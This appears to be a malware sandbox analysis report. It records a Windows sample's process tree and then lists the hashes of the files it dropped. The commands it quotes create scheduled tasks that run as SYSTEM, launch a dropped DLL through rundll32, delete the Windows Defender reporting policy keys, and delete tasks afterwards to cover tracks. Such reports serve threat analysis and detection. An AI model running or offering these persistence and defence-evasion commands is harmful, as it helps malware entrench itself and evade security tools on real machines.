C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "idGglYgIlRbjxykKx2" /F /xml "C:\Program Files (x86)\dACkfQRkXjMlVDtnXZR\zjfZlzi.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EvJmcymORqECUgpBZDb2" /F /xml "C:\Program Files (x86)\VgjyoxcUurXmC\mIOAVDQ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aaSAiCeWTOJWAqakW" /SC once /ST 00:15:07 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\eogxozCJrYNgvSKM\NXycGAVY\VVDSQRN.dll\",#1 /bSsite_idcgt 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "aaSAiCeWTOJWAqakW"3⤵PID:2808
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2688
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2596
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:2508
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YjdyicABEfUJyYqxF"3⤵PID:2948
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\eogxozCJrYNgvSKM\NXycGAVY\VVDSQRN.dll",#1 /bSsite_idcgt 5254032⤵PID:1044
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\eogxozCJrYNgvSKM\NXycGAVY\VVDSQRN.dll",#1 /bSsite_idcgt 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2780 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aaSAiCeWTOJWAqakW"4⤵PID:2548
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2000
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3000
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2692
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5af875d98f42833f03308f9f4c872fdd4
SHA1f8413756de8f0f3855f0850d105361d1243842de
SHA25698249b44c8934653c6ef5edd365fc33ffb29582f32de7694688f5c7c5389cdb5
SHA5121b2ef0bca432770631fac7b1a2b3081bc3ea7ebdf7bbd1326f999a69b430194d8f3c10827195fe6725484a00b99d84a5311c48a15f82ea07154e6bf86ce85c26
-
Filesize
2KB
MD5e3c890a5a7095b8a32dce7518feb3133
SHA1972d4643a4473ff7d97200c0b6597726877e2e4a
SHA256c9a99ac087fdc0f469018419e760013c4f31b656390e3957fc48c08232c653b9
SHA5129b561dcaaa7dbccfabb232070d6ce2b6ca2c8db09cdece1b04724d45b54961a8eaeba67a4158ba15990dd8c583d526837f119b198df0b73a281c240dbae59617
-
Filesize
2KB
MD5f7e0b683997df5797aabd36752eb3d62
SHA167b156934560d4b71b5c83a8376214fbd809d73d
SHA256285c559e452c124258931f77cb1838a2f98c3798bbc47dbef5bce5df915f08c7
SHA51203bf642bf7c666feee4830aea971c844edbf7a43520aa114c14ca96226d12b51257fc68a053c4efee2212bc4973c2d8d877b954a1f02c70b8c591bdb7f414ea0
-
Filesize
2KB
MD527b193bc16daabe4fb6d4379c6680d27
SHA1bca72dc61e03772ed9a03cb527c55202ca1c75bc
SHA2562f8f2da835de26e0ff30a74cda4ebe2efa428ebcbc4ae36db2c1494354dbdb2b
SHA512a0b02fb0768a93bd6c4f40d698d5204e0643bfada6dee277c3f8d6770de00123247af0ce7eb804faaaaed7c2536ee18eae3dcf0d8f4a315636bad7f2c21be671
-
Filesize
1.8MB
MD5df2e0505010238c85f90b0efccf84726
SHA1643ed91e90d8f697ce22b77d381a88ebabeea8e6
SHA256262e704848e6754459930bf9de4b90426ab4c786ecb91970cb78ae461ee49948
SHA51259097e48ced5a4d5ba27957a33605364bd7935cf9dccba7d8c5406986da3ec82d2dd5e58deb43e8a7e7f1807e169493455d082e53ed457347fa59066914de63c
-
Filesize
2KB
MD5db8a3015ca733c835ebf24b8f89682e7
SHA186f6d84c0d0046e3b3aa462533c4f68d4eb94ad5
SHA25665bc23b7b2230a15c7209aa3bdfc58773918622751a72f26c6ca4c32bbf92b01
SHA512919ba0197f2a6b4fec3d40de9036a0130f770c201d4ce830f89fb6ac1a7ef161f7090676c34a5c746eaa51a6272f53ce74554e7f1ab507ca08db809509578a72
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
9KB
MD5a36a7af8a15690a4f869cd040acdc1d4
SHA12c282b14db88f8bd58e6ac422f6a9c87eb548215
SHA256c1d66134810491c07700ada779a7d77463cd3449a4b9a8b57f1a34c766f3f8a2
SHA512cb5ec91407238e60204f23697c5da172c202fe44ac0b05e5a7eabfb0a4ae9b29c1262c221be3c460bed626738445071b2cbb18c507b81617db37c07c4cba00c1
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52327d61eed899fc398519697b175de75
SHA130a97cbe334a14392a91bc978f0e17d02f59fdff
SHA256b1640a40f1c7a4f50d53be391473ecd93814422282509818f2d37777e314a8e4
SHA512dbe33fa0fd7842ec0116a45558b819e604e196060195150177dfe7964b55172f001c19114500cdc3d83fc4db89facdee841eecaf9616589f10eaa1ef806ec4b1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ecd499f696610dfe5f6c8045617e9a77
SHA1e272700ee405840569f34baec20db6cec2b1ccf3
SHA2564f9205e7d459f0ac0de4b4d54193a846e2ccec37fa47d0f6ed8afde833b33652
SHA5124fe692559853879721c9515b33bc043b798ee53ca581c20b37c2c2a6041f80dd7b38836c5cc33132182c31f6cf634e88347e4c05ea402faae78da1ac70649e9e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e93bdd2aaf0f64c5a3a82d84ebdad212
SHA1f359b787ee4afad39cac9ecd407100176c9196db
SHA25655a1f4037abd0f07e33c4196f3f597da5b886ec0e3ec7fafec5712d26bf86c06
SHA512b5c4f64017ae9a76ddcbe411e1ae3b18bcc77a6890a85e32e1b7a77e914624eb9aa2d98cea9736b750754508a1faa950066095a051b13d4ba634d0b7c7445de0
-
Filesize
7KB
MD529584d6cdb4555ec2f185c141f833eca
SHA1d94209b4bcd63c91539b0a97b1890d13c9210555
SHA25607e8c02a4991e2f6fb9e342e130a7ea36db775342416e8aa04631c69f27accdb
SHA512053f0e823f6185d8fddeba8400d3bdcfb6901be23603c0f879e95e27afb398a890739c654b126be704de5f302edcf4878ff0a8f8958a688719324a2104863c06
-
Filesize
6.1MB
MD56136ed187b0ed906ec5548ebe89f7ec9
SHA103c7bfca27bad70da2b3bd9c3c1160d8e0f0fa33
SHA25680b28b54de4e2e07a98f7ec025991a51d77d9137de358d181fde0e0535774d49
SHA512500b0ee00406af45f297b6b943f87f13e0309197a288ed65b9417dd6395c32f427de44d0641e2efb52a6e0ebd24df1b303523987ae4a741e7c269bb776f29211
-
Filesize
9KB
MD53abb5e7fbbff7eef727f7017084d805d
SHA1198c068c29c07cb4582d104680debe6e62dfa7d8
SHA2560996a209f33f7af0618ae02bca1eda43e882cb31a2c4e45004b095560672c736
SHA512b94ddb535a69a73afccde14ae59cfe72a6e2c124771fdf9a013ca1a9eaf761ad040c353003e9b6c2e4fce6ff31db455c427d97bdbc1e475d6b3f537bbda014bf
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
6KB
MD514686d451c6e651e33664987aa30dfdc
SHA1cc537485bebf6189a3c6a1b7d08b29cac1eeb423
SHA2569c1d32e898db10c648a4c06c3bf6f746e78400b8cff3e6337719c1042fa0d5a7
SHA5127ce09393d166640cd200738f06e5c91bda796c4029fd2883d6c9bad632c93f0bbadb8d3ff95dbbab82d45824559e7fbc87848d84af28d0f4a5163b162199527d
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
6.1MB
MD56bf7a763cab111cf2e698bdea1f4b00f
SHA1b756a811ecf6c44a9d438e476fa8f91352d77b77
SHA256cea934a3aa448485f5e226f1449929a6335c32058d9edd1e973cd55e5cc726fe
SHA5128bd9e8255a45a7283bc5bd12a775d2d8eb5ab698ef00dc2be7877fcdb0402f012f63a193aeb68e62cc8606c9bd5315a875d8f2efb3bd8bd2cdf5d733786af84d
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
7.0MB
MD5a6546ff1f33da64dd1b6ce8602e87235
SHA110359c292d3cb88053a51e9d3886655c6989e906
SHA25612753349b877d0a356c7704ffd7455bf56984a82ab7bc7b92eac813477d4359c
SHA5123fc09561318c4de17ea160701a1343155f5898a341cb6a0428b50a4c894b27b16603ecc77d238b49c3fda27d1cfb8298c0d4bd1c15db1d97fabc83f8926f7c4a
-
Filesize
6.1MB
MD56136ed187b0ed906ec5548ebe89f7ec9
SHA103c7bfca27bad70da2b3bd9c3c1160d8e0f0fa33
SHA25680b28b54de4e2e07a98f7ec025991a51d77d9137de358d181fde0e0535774d49
SHA512500b0ee00406af45f297b6b943f87f13e0309197a288ed65b9417dd6395c32f427de44d0641e2efb52a6e0ebd24df1b303523987ae4a741e7c269bb776f29211
-
Filesize
6.1MB
MD56136ed187b0ed906ec5548ebe89f7ec9
SHA103c7bfca27bad70da2b3bd9c3c1160d8e0f0fa33
SHA25680b28b54de4e2e07a98f7ec025991a51d77d9137de358d181fde0e0535774d49
SHA512500b0ee00406af45f297b6b943f87f13e0309197a288ed65b9417dd6395c32f427de44d0641e2efb52a6e0ebd24df1b303523987ae4a741e7c269bb776f29211
-
Filesize
6.1MB
MD56136ed187b0ed906ec5548ebe89f7ec9
SHA103c7bfca27bad70da2b3bd9c3c1160d8e0f0fa33
SHA25680b28b54de4e2e07a98f7ec025991a51d77d9137de358d181fde0e0535774d49
SHA512500b0ee00406af45f297b6b943f87f13e0309197a288ed65b9417dd6395c32f427de44d0641e2efb52a6e0ebd24df1b303523987ae4a741e7c269bb776f29211
-
Filesize
6.1MB
MD56136ed187b0ed906ec5548ebe89f7ec9
SHA103c7bfca27bad70da2b3bd9c3c1160d8e0f0fa33
SHA25680b28b54de4e2e07a98f7ec025991a51d77d9137de358d181fde0e0535774d49
SHA512500b0ee00406af45f297b6b943f87f13e0309197a288ed65b9417dd6395c32f427de44d0641e2efb52a6e0ebd24df1b303523987ae4a741e7c269bb776f29211